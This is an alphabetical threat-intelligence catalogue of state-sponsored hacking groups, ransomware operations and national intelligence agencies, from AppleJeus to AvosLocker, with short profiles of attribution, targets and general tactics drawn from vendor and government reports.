AppleJeus is a North Korean state-sponsored threat group attributed to the Reconnaissance General Bureau. Associated with the broader Lazarus Group umbrella of actors, AppleJeus has been active since at least 2018 and is closely aligned in resources with TEMP.hermit, another DPRK-affiliated group under the same umbrella. [dtex DPRK 2025 structure ITworkers](https://reports.dtexsystems.com/DTEX-Exposing+DPRK+Cyber+Syndicate+and+Hidden+IT+Workforce.pdf) The group’s primary mission is to generate and launder revenue to provide financial support to the government. AppleJeus primarily targets the cryptocurrency industry and is most notably responsible for the 3CX Supply Chain Attack. [Mandiant 3cx UNC4736 2023](https://cloud.google.com/blog/topics/threat-intelligence/3cx-software-supply-chain-compromise/) The group traditionally deploys malicious cryptocurrency software in combination with Phishing. From these compromised environments, it selectively deploys additional backdoors to enable extended operations against high-value financial targets. [Mandiant DPRK Groups 2023](https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure-alignment-2023) [JPCert Blog Laz Subgroups 2025](https://blogs.jpcert.or.jp/en/2025/03/classifying-lazaruss-subgroup.html)
Water Galura
Water Galura are the operators of the Qilin Ransomware-as-a-Service (RaaS) who handle payload generation, ransom negotiations, and the publication of stolen data for Qilin affilates recruited on Russian cybercrime forums. Water Galura have been active since at least 2022 and use a double extortion model where they demand payment for providing decryption keys and for refraining from publishing the stolen data to their leak site. [BushidoToken Qilin RaaS JUN 2024](https://blog.bushidotoken.net/2024/06/tracking-adversaries-qilin-raas.html) [Sophos Qilin MSP APR 2025](https://news.sophos.com/en-us/2025/04/01/sophos-mdr-tracks-ongoing-campaign-by-qilin-affiliates-targeting-screenconnect/)
Medusa Group
Medusa Group has been active since at least 2021 and was initially operated as a closed ransomware group before evolving into a Ransomware-as-a-Service (RaaS) operation. Some reporting indicates that certain attacks may still be conducted directly by the ransomware’s core developers. Public sources have also referred to the group as “Spearwing” or “Medusa Actors.” [CISA Medusa Group Medusa Ransomware March 2025](https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a) [Broadcom Medusa Ransomware Medusa Group March 2025](https://www.security.com/threat-intelligence/medusa-ransomware-attacks) Medusa Group employs living-off-the-land techniques, frequently leveraging publicly available tools and common remote management software to conduct operations. The group engages in double extortion tactics, exfiltrating data prior to encryption and threatening to publish stolen information if ransom demands are not met. [Security Scorecard Medusa Ransomware January 2024](https://securityscorecard.com/wp-content/uploads/2024/01/deep-dive-into-medusa-ransomware.pdf) For initial access, Medusa Group has exploited publicly known vulnerabilities, conducted phishing campaigns, and used credentials or access purchased from Initial Access Brokers (IABs). The group is opportunistic and has targeted a wide range of sectors globally. [Intel471 Medusa Ransomware May 2025](https://www.intel471.com/blog/threat-hunting-case-study-medusa-ransomware)
Contagious Interview
Contagious Interview is a North Korea–aligned threat group active since 2023. The group conducts both cyberespionage and financially motivated operations, including the theft of cryptocurrency and user credentials. Contagious Interview targets Windows, Linux, and macOS systems, with a particular focus on individuals engaged in software development and cryptocurrency-related activities. [Validin Contagious Interview North Korea ClickFix January 2025](https://www.validin.com/blog/inoculating_contagious_interview_with_validin/) [Esentire ContagiousInterview BeaverTail InvisibleFerret November 2024](https://www.esentire.com/blog/bored-beavertail-invisibleferret-yacht-club-a-lazarus-lure-pt-2) [Datadog Contagious Interview Tenacious Pungsan October 2024](https://securitylabs.datadoghq.com/articles/tenacious-pungsan-dprk-threat-actor-contagious-interview/) [Recorded Future Contagious Inteview BeaverTail InvisibleFerret OtterCookie February 2025](https://www.recordedfuture.com/research/inside-the-scam-north-koreas-it-worker-threat) [ESET Contagious Interview BeaverTail InvisibleFerret February 2025](https://www.welivesecurity.com/en/eset-research/deceptivedevelopment-targets-freelance-developers/) [Zscaler ContagiousInterview BeaverTail InvisibleFerret November 2024](https://www.zscaler.com/blogs/security-research/pyongyang-your-payroll-rise-north-korean-remote-workers-west) [PaloAlto ContagiousInterview BeaverTail InvisibleFerret November 2023](https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/) [PaloAlto Unit42 ContagiousInterview BeaverTail InvisibileFerret October 2024](https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-job-seekers-as-fake-recruiters/)
Storm-0501
Storm-0501 is a financially motivated cyber criminal group that uses commodity and open-source tools to conduct ransomware operations. Storm-0501 has been active since 2021 and has previously been affiliated with Sabbath Ransomware and other Ransomware-as-a-Service (RaaS) variants such as Hive, BlackCat, Hunters International, LockBit 3.0, and Embargo ransomware. [Avertium Storm-0501 Sabbath Ransomware Arcane January 2022](https://www.avertium.com/resources/threat-reports/in-depth-look-at-sabbath-ransomware-gang) [Microsoft Storm-501 Sabbath Ransomware Embargo September 2024](https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/) [Microsoft Storm-0501 Embargo Ransomware August 2025](https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/) [Google Mandiant Storm-0501 Sabbath Ransomware November 2021](https://cloud.google.com/blog/topics/threat-intelligence/sabbath-ransomware-affiliate/)
APT14
PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the area of operations of the South Sea Fleet of the PLA Navy. In addition to maritime operations in this region, Anchor Panda also heavily targeted western companies in the US, Germany, Sweden, the UK, and Australia, and other countries involved in maritime satellite systems, aerospace companies, and defense contractors. Not surprisingly, embassies and diplomatic missions in the region, foreign intelligence services, and foreign governments with space programs were also targeted.
APT15
This threat actor uses phishing techniques to compromise the networks of foreign ministries of European countries for espionage purposes.
APT2
Putter Panda were the subject of an extensive report by CrowdStrike, which stated: 'The CrowdStrike Intelligence team has been tracking this particular unit since2012, under the codename PUTTER PANDA, and has documented activity dating back to 2007. The report identifies Chen Ping, aka cpyy, and the primary location of Unit 61486.'
APT20
We’ve uncovered some new data and likely attribution regarding a series of APT watering hole attacks this past summer. Watering hole attacks are an increasingly popular component of APT campaigns, as many people are more aware of spear phishing and are less likely to open documents or click on links in unsolicited emails. Watering hole attacks offer a much better chance of success because they involve compromising legitimate websites and installing malware intended to compromise website visitors. These are often popular websites frequented by people who work in specific industries or have political sympathies to which the actors want to gain access. In contrast to many other APT campaigns, which tend to rely heavily on spear phishing to gain victims, “th3bug” is known for compromising legitimate websites their intended visitors are likely to frequent. Over the summer they compromised several sites, including a well-known Uyghur website written in that native language.
APT21
APT21 is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
APT22
Suckfly is a China-based threat group that has been active since at least 2014
APT23
TrendMicro described Tropic Trooper in a 2015 report as: 'Taiwan and the Philippines have become the targets of an ongoing campaign called Operation TropicTrooper. Active since 2012, the attackers behind the campaign haveset their sights on the Taiwanese government as well as a number of companies in the heavy industry. The same campaign has also targeted key Philippine military agencies.'
APT24
The Pitty Tiger group has been active since at least 2011. They have been seen using HeartBleed vulnerability in order to directly get valid credentials
APT26
Microsoft threat actor profile. Origin/Threat: China.
APT27
A China-based actor that targets foreign embassies to collect data on government, defence, and technology sectors.
APT28
APT28 is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165. [NSA/FBI Drovorub August 2020](https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF) [Cybersecurity Advisory GRU Brute Force Campaign July 2021](https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF) This group has been active since at least 2004. [DOJ GRU Indictment Jul 2018](https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf) [Ars Technica GRU indictment Jul 2018](https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/) [Crowdstrike DNC June 2016](https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/) [FireEye APT28](https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf) [SecureWorks TG-4127](https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign) [FireEye APT28 January 2017](https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf) [GRIZZLY STEPPE JAR](https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf) [Sofacy DealersChoice](https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/) [Palo Alto Sofacy 06-2018](https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/) [Symantec APT28 Oct 2018](https://www.symantec.com/blogs/election-security/apt28-espionage-military-government) [ESET Zebrocy May 2019](https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/) APT28 reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. [Crowdstrike DNC June 2016](https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/) In 2018, the US indicted five GRU Unit 26165 officers associated with APT28 for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations. [US District Court Indictment GRU Oct 2018](https://www.justice.gov/opa/page/file/1098481/download) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as Sandworm Team.
APT29
APT29 is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR). [White House Imposing Costs RU Gov April 2021](https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/) [UK Gov Malign RIS Activity April 2021](https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. APT29 reportedly compromised the Democratic National Committee starting in the summer of 2015. [F-Secure The Dukes](https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf) [GRIZZLY STEPPE JAR](https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf) [Crowdstrike DNC June 2016](https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/) [UK Gov UK Exposes Russia SolarWinds April 2021](https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise) In April 2021, the US and UK governments attributed the SolarWinds Compromise to the SVR; public statements included citations to APT29, Cozy Bear, and The Dukes. [NSA Joint Advisory SVR SolarWinds April 2021](https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF) [UK NSCS Russia SolarWinds April 2021](https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise) Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm. [FireEye SUNBURST Backdoor December 2020](https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html) [MSTIC NOBELIUM Mar 2021](https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/) [CrowdStrike SUNSPOT Implant January 2021](https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/) [Volexity SolarWinds](https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/) [Cybersecurity Advisory SVR TTP May 2021](https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf) [Unit 42 SolarStorm December 2020](https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/)
APT31
FireEye characterizes APT31 as an actor specialized on intellectual property theft, focusing on data and projects that make a particular organization competetive in its field. Based on available data (April 2016), FireEye assesses that APT31 conducts network operations at the behest of the Chinese Government. Also according to Crowdstrike, this adversary is suspected of continuing to target upstream providers (e.g., law firms and managed service providers) to support additional intrusions against high-profile assets. In 2018, CrowdStrike observed this adversary using spear-phishing, URL “web bugs” and scheduled tasks to automate credential harvesting.
APT32
APT32 is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. [FireEye APT32 May 2017](https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html) [Volexity OceanLotus Nov 2017](https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/) [ESET OceanLotus](https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/)
APT34
OilRig is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. The group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. [FireEye APT34 Dec 2017](https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html) [Palo Alto OilRig April 2017](http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/) [ClearSky OilRig Jan 2017](http://www.clearskysec.com/oilrig/) [Palo Alto OilRig May 2016](http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/) [Palo Alto OilRig Oct 2016](http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/) [Unit42 OilRig Playbook 2023](https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens) [Unit 42 QUADAGENT July 2018](https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/)
APT35
Magic Hound is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014. [FireEye APT35 2018](https://static.carahsoft.com/concrete/files/1015/2779/3571/M-Trends-2018-Report.pdf) [ClearSky Kittens Back 3 August 2020](https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf) [Certfa Charming Kitten January 2021](https://blog.certfa.com/posts/charming-kitten-christmas-gift/) [Secureworks COBALT ILLUSION Threat Profile](https://www.secureworks.com/research/threat-profiles/cobalt-illusion) [Proofpoint TA453 July2021](https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453)
APT4
Sodium is reportedly a "sophisticated Chinese state-affiliated" threat actor group, which has especially targeted defense, government, and high-tech organizations in the United States.[[GitHub cybershujin Threat-Actors-use-of-Artifical-Intelligence](/references/b595af7e-ff84-49fa-8e07-cd2abe9e1d65)]
APT40
Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company. [CISA AA21-200A APT40 July 2021](https://us-cert.cisa.gov/ncas/alerts/aa21-200a) Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Australia, Europe, the Middle East, and Southeast Asia. [CISA AA21-200A APT40 July 2021](https://us-cert.cisa.gov/ncas/alerts/aa21-200a) [Proofpoint Leviathan Oct 2017](https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets) [FireEye Periscope March 2018](https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html) [CISA Leviathan 2024](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-190a)
APT41
APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries. [apt41_mandiant](https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf) Notable behaviors include using a wide range of malware and tools to complete mission objectives. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group. [FireEye APT41 Aug 2019](https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf) [Group IB APT 41 June 2021](https://www.group-ib.com/blog/colunmtk-apt41/)
APT42 (Deprecated)
*We are no longer maintaining this object in favor of a similar object subsequently published by MITRE: "APT42" (Group). All relevant Tidal content extensions (e.g. additional Technique and Object relationships and metadata) have been added to the MITRE-authored object.* APT42 is an Iranian state-sponsored espionage group believed to operate on behalf of the Islamic Revolutionary Guard Corps (IRGC) Intelligence Organization (IRGC-IO). APT42 primarily focuses on collecting information on and surveilling its targets, mainly individuals and organizations with strategic significance to Iran's government. The group's operations are characterized by targeted spear-phishing attacks and surveillance activity. Mandiant researchers acknowledged overlaps between APT42 and APT35, which both likely operate on behalf of the IRGC, but noted that the groups display "substantial differences" in targeting patterns and TTPs.[[Mandiant Crooked Charms August 12 2022](/references/53bab956-be5b-4d8d-b553-9926bc5d9fee)]
APT43
• APT43 is a prolific cyber operator that supports the interests of the North Korean regime. The group combines moderately-sophisticated technical capabilities with aggressive social engineering tactics, especially against South Korean and U.S.-based government organizations, academics, and think tanks focused on Korean peninsula geopolitical issues. • In addition to its espionage campaigns, we believe APT43 funds itself through cybercrime operations to support its primary mission of collecting strategic intelligence. • The group creates numerous spoofed and fraudulent personas for use in social engineering, as well as cover identities for purchasing operational tooling and infrastructure. • APT43 has collaborated with other North Korean espionage operators on multiple operations, underscoring the major role APT43 plays in the regime’s cyber apparatus.
APT45
APT45 is a North Korean cyber threat actor that has been active since at least 2009. They have conducted espionage campaigns targeting government agencies and defense industries, as well as financially-motivated operations, including ransomware development. APT45 has targeted critical infrastructure, financial organizations, nuclear research facilities, and healthcare and pharmaceutical companies. They use a mix of publicly available tools, modified malware, and custom malware families in their operations.
APT6
The FBI issued a rare bulletin admitting that a group named Advanced Persistent Threat 6 (APT6) hacked into US government computer systems as far back as 2011 and for years stole sensitive data. The FBI alert was issued in February and went largely unnoticed. Nearly a month later, security experts are now shining a bright light on the alert and the mysterious group behind the attack. “This is a rare alert and a little late, but one that is welcomed by all security vendors as it offers a chance to mitigate their customers and also collaborate further in what appears to be an ongoing FBI investigation,” said Deepen Desai, director of security research at the security firm Zscaler in an email to Threatpost. Details regarding the actual attack and what government systems were infected are scant. Government officials said they knew the initial attack occurred in 2011, but are unaware of who specifically is behind the attacks. “Given the nature of malware payload involved and the duration of this compromise being unnoticed – the scope of lateral movement inside the compromised network is very high possibly exposing all the critical systems,”Deepen said.
APT73
APT73 is a ransomware group that has publicly identified 12 victims and launched its data leak site on April 25th. The DLS bears a striking resemblance to that of LockBit, likely to leverage LockBit's reputation and attract potential affiliates. The rationale for this design mimicry is unclear, but it may be intended to signal operational parity with LockBit to inspire trust among low-level criminals. APT73 was formed by an alleged former LockBit affiliate following law enforcement's "Operation Cronos" in February 2024.
APT9
APT9 engages in cyber operations where the goal is data theft, usually focusing on the data and projects that make a particular organization competitive within its field. APT9 was historically very active in the pharmaceuticals and biotechnology industry. We have observed this actor use spearphishing, valid accounts, as well as remote services for Initial Access. On at least one occasion, Mandiant observed APT9 at two companies in the biotechnology industry and suspect that APT9 actors may have gained initial access to one of the companies by using a trusted relationship between the two companies. APT9 use a wide range of backdoors, including publicly available backdoors, as well as backdoors that are believed to be custom, but are used by multiple APT groups.
APTIran
APTIran has claimed responsibility for a large-scale campaign targeting Israeli critical infrastructure, asserting infiltration of government ministries, hospitals, universities, and financial institutions as retaliation for Israeli military operations. The group has leaked over 350,000 Israeli government login credentials and approximately 300 internal databases, while also threatening to create a 'zombie' network from infected devices. They have reportedly deployed ransomware strains such as ALPHV and LockBit as part of their offensive toolkit. Additionally, APTIran has made unverified claims of compromising Israeli water control systems and the state-owned food security agency Jordan Silos and Supply General Co.
aptlock
Aptlock surfaced in early 2025 and is characterized by a single-extortion model combined with threats of data leakage. The ransomware encrypts files on Windows systems, appending the extension .aptlock, and then changes the victim’s desktop wallpaper. Victims receive a ransom note named read_me_to_access.txt informing them that their critical company data has been exfiltrated and will be deleted or leaked if they don’t act. They are given 72 hours to initiate contact via Tor-based chat access (using credentials provided in the note), with further warnings issued if no engagement occurs within 5 days. Specific details about intrusion vectors, encryption algorithms used, or known affiliate operators remain undisclosed in public threat intelligence. No reliable evidence links Aptlock to Ransomware-as-a-Service operations or lists any known affiliates.
Arachna Leak
Arachna Leak is an active extortion or ransomware group tracked by RansomLook.
arcane
Arcane first emerged in mid-2021 under the UNC2190 cluster and later rebranded as Sabbath, continuing its operations against critical infrastructure like hospitals, schools, and educational entities. It follows a double-extortion model—encrypting data (using ROLLCOAST/Eruption malware) while also exfiltrating sensitive information and threatening to leak it. Victims have included institutions in the U.S. and Canada across sectors such as healthcare, education, and natural resources. Initial intrusion tactics involved deployment of Cobalt Strike with custom profiles, DLL-based in-memory execution, and signed TLS certificates, plus use of stealthy GET requests ending with “kitten.gif.” Specific encryption algorithms or file extensions have not been publicly confirmed. The group appears to operate in an affiliate-style model but remains under single management rather than a full RaaS platform.
ArcaneDoor
ArcaneDoor is a campaign that is the latest example of state-sponsored actors targeting perimeter network devices from multiple vendors. Coveted by these actors, perimeter network devices are the perfect intrusion point for espionage-focused campaigns. As a critical path for data into and out of the network, these devices need to be routinely and promptly patched; using up-to-date hardware and software versions and configurations; and be closely monitored from a security perspective. Gaining a foothold on these devices allows an actor to directly pivot into an organization, reroute or modify traffic and monitor network communications. In the past two years, we have seen a dramatic and sustained increase in the targeting of these devices in areas such as telecommunications providers and energy sector organizations — critical infrastructure entities that are likely strategic targets of interest for many foreign governments.
arcrypter
ArcRypt (also known as ARCrypter or ChileLocker) was first identified in August 2022, originally targeting government entities in Latin America and subsequently expanding globally. The group employs a single-extortion model—there is no evidence of a data-leak threat or RaaS ecosystem. The malware encrypts files using extensions such as .crypt, .crYpt, and .crYptA3, and uniquely drops the ransom note before commencing encryption. It has variants for both Windows and Linux, including a Go-based Linux version. Communication with victims occurs via Tor-based portals, evolving over time from a single shared site to individualized mirror sites for each victim. In some cases, threat actors have instructed victims to contact them using Tox, creating a Tox profile for communication. Targets have included Chile’s government infrastructure, Colombia’s Invima agency, and organizations in China and Canada.
Arcus Media
Arcus Media is an active extortion or ransomware group tracked by RansomLook.
Argonauts Group
Argonauts Group is an active extortion or ransomware group tracked by RansomLook.
Argus
Ransomware
AridViper
AridViper is a state-sponsored APT primarily targeting military personnel, journalists, and dissidents in the Middle East, with a focus on Israel and Palestine. The group employs custom-developed mobile malware, including variants like AridSpy, GnatSpy, and Micropsia, often delivered through spear-phishing emails and deceptive applications. Their operations involve sophisticated social engineering tactics, including the use of fake social media profiles and weaponized apps masquerading as legitimate services. AridViper's activities are characterized by a blend of technical sophistication and psychological manipulation, aiming to exfiltrate sensitive data from compromised systems.
Aris Locker
ransomware
Arkana Security
Arkana Security is an active extortion or ransomware group tracked by RansomLook.
Armage
Ransomware
ArmaLocky
Ransomware
Armed Forces Security Center (AFSC)
Armed Forces Security Center (AFSC)
Army Intelligence Center
Army Intelligence Center (Efterretningsregimentet (EFR)).
Army Intelligence Department (page does not exist)
Army Intelligence Department (military intelligence)
Army Military Intelligence Command (AMIC)
Army Military Intelligence Command (AMIC)
Arsium
Ransomware
Arvinclub
Arvin Club is a popular Ransomware group with a widespread Telegram presence, which includes personal group chats, and official channels. The group recently launched their official TOR/ Onion website to update their status and release details of their latest attacks and data breaches. Their latest target is Kendriya Vidyala, a chain of Schools in India. The group has exposed the Personally Identifiable Information (PII) of some students.
Aslan Neferler Tim
Turkish nationalist hacktivist group that has been active for roughly one year. According to Domaintools, the group’s site has been registered since December 2015, with an active Twitter account since January 2016. The group carries out distributed denial-of-service (DDoS) attacks and defacements against the sites of news organizations and governments perceived to be critical of Turkey’s policies or leadership, and purports to act in defense of Islam
ASN1 Encoder Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Asnarök
Asnarök is a threat actor that exploited CVE-2020-12271 and utilized command injection privilege escalation to gain root access to devices and install the Asnarök Trojan and demonstrated significant changes in TTPs, including the deployment of a web shell that did not reach out to external C2 for commands. X-Ops identified a patient-zero device linked to the attack and observed the use of an IC.sh script that stole local user account data. The actor's activities were linked to a broader pattern of malicious exploit research and targeted vulnerabilities disclosed by bug bounty researchers.
Assembly
Ransomware
Assistant Attorney General's Office for Special Investigations on Organized Crime
Assistant Attorney General's Office for Special Investigations on Organized Crime (SEIDO / PGR)
astralocker
AstraLocker first appeared in 2021, likely as a fork of Babuk ransomware using leaked source code. It follows a single-extortion, smash-and-grab approach: distributed directly via phishing Microsoft Word documents containing embedded OLE objects. Once executed, it kills security and backup processes, deletes shadow copies, and encrypts files using modified HC-128 and Curve25519 algorithms, appending extensions like .Astra or .babyk. A “smash-and-grab” style attack, it’s less methodical than more sophisticated campaigns—deploying ransomware immediately upon user action rather than conducting prolonged network reconnaissance. In mid-2022, the operator ceased ransomware operations, releasing decryptors and announcing a pivot to cryptojacking.
Astro Locker
Ransomware
Ataware
Ransomware
Atchbo
Ransomware
ATLAS
Ransomware
AtlasCross
NSFOCUS Security Labs recently discovered a new attack process based on phishing documents in their daily threat-hunting operations. Delving deeper into this finding through extensive research, they confirmed two new Trojan horse programs and many rare attack techniques and tactics. NSFOCUS Security Labs believes that this new attack process comes from a new APT attacker, who has a high technical level and cautious attack attitude. The phishing attack activity captured this time is part of the attacker’s targeted strike on specific targets and is its main means to achieve in-domain penetration. NSFOCUS Security Labs validated the high-level threat attributes of AtlasCross in terms of development technology and attack strategy through an in-depth analysis of its attack metrics. At this current stage, AtlasCross has a relatively limited scope of activity, primarily focusing on targeted attacks against specific hosts within a network domain. However, the attack processes they employ are highly robust and mature. NSFOCUS Security Labs deduce that this attacker is highly likely to deploy this attack process into larger-scale network attack operations.
Atomsilo
AtomSilo is a new Ransomware recently seen in September 2021 during one of their attacks by exploiting a recently revealed vulnerability (CVE-2021-26084) in Atlassian’s Confluence Collaboration Software for initial access. The Ransomware used the double extortion method which is gaining popularity among ransomware threat actors where they first, exfiltrate the confidential information and as a second step encrypt the system files.
Attor
Adversary group targeting diplomatic missions and governmental organisations.
Attorney General's Office of Indonesia
Deputy Attorney General on Intelligence (Under the Attorney General's Office) – Jaksa Agung Muda Bidang Intelijen Kejaksaan Agung
Audit Team
Audit Team is an active extortion or ransomware group tracked by RansomLook.
Aurora Ransomware
Typical ransom software, Aurora virus plays the role of blackmailing PC operators. It encrypts files and the encryption cipher it uses is pretty strong. After encryption, the virus attaches .aurora at the end of the file names that makes it impossible to open the data. Thereafter, it dispatches the ransom note totaling 6 copies, without any change to the main objective i.e., victims must write an electronic mail addressed to anonimus.mr@yahoo.com while stay connected until the criminals reply telling the ransom amount.
Aurora
Aurora is an active extortion or ransomware group tracked by RansomLook.
Australian-AES
Ransomware
Australian Geospatial-Intelligence Organisation
Australian Geospatial-Intelligence Organisation (AGO)
Australian Secret Intelligence Service
Australian Secret Intelligence Service (ASIS)
Australian Security Intelligence Organisation
Australian Security Intelligence Organisation (ASIO)
Australian Signals Directorate
Australian Signals Directorate (ASD)
AutoEncryptor
Ransomware
AutoLocky
Ransomware
Automated Libra
Automated Libra is a South African-based freejacking group that primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform their cryptomining operations.[[Sysdig October 25 2022](/references/177272f8-2701-4803-ab61-f64afa046127)][[Unit 42 December 5 2024](/references/bae298f0-71ac-4841-8670-1b805cc7f9dd)][[Free Trial PurpleUrchin](/references/841f397d-d103-56d7-9854-7ce43c684879)]
AutoWannaCryV2
Ransomware
Auuahk-Ouuohk
Ransomware
Avaddon
Avaddon is a ransomware malware targeting Windows systems often spread via malicious spam. The first known attack where Avaddon ransomware was distributed was in February 2020. Avaddon encrypts files using the extension .avdn and uses a TOR payment site for the ransom payment.
AvastVirusinfo Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. PAYING RANSOM IS USELESS, YOUR FILES WILL NOT BE FIXED. THE DAMAGE IS PERMENENT!!!!
AVCrypt
Ransomware
Avivore
The group’s existence came to light during Context’s investigation of a number of attacks against multinational enterprises that compromise smaller engineering services and consultancies working in their supply chains.
AvosLocker
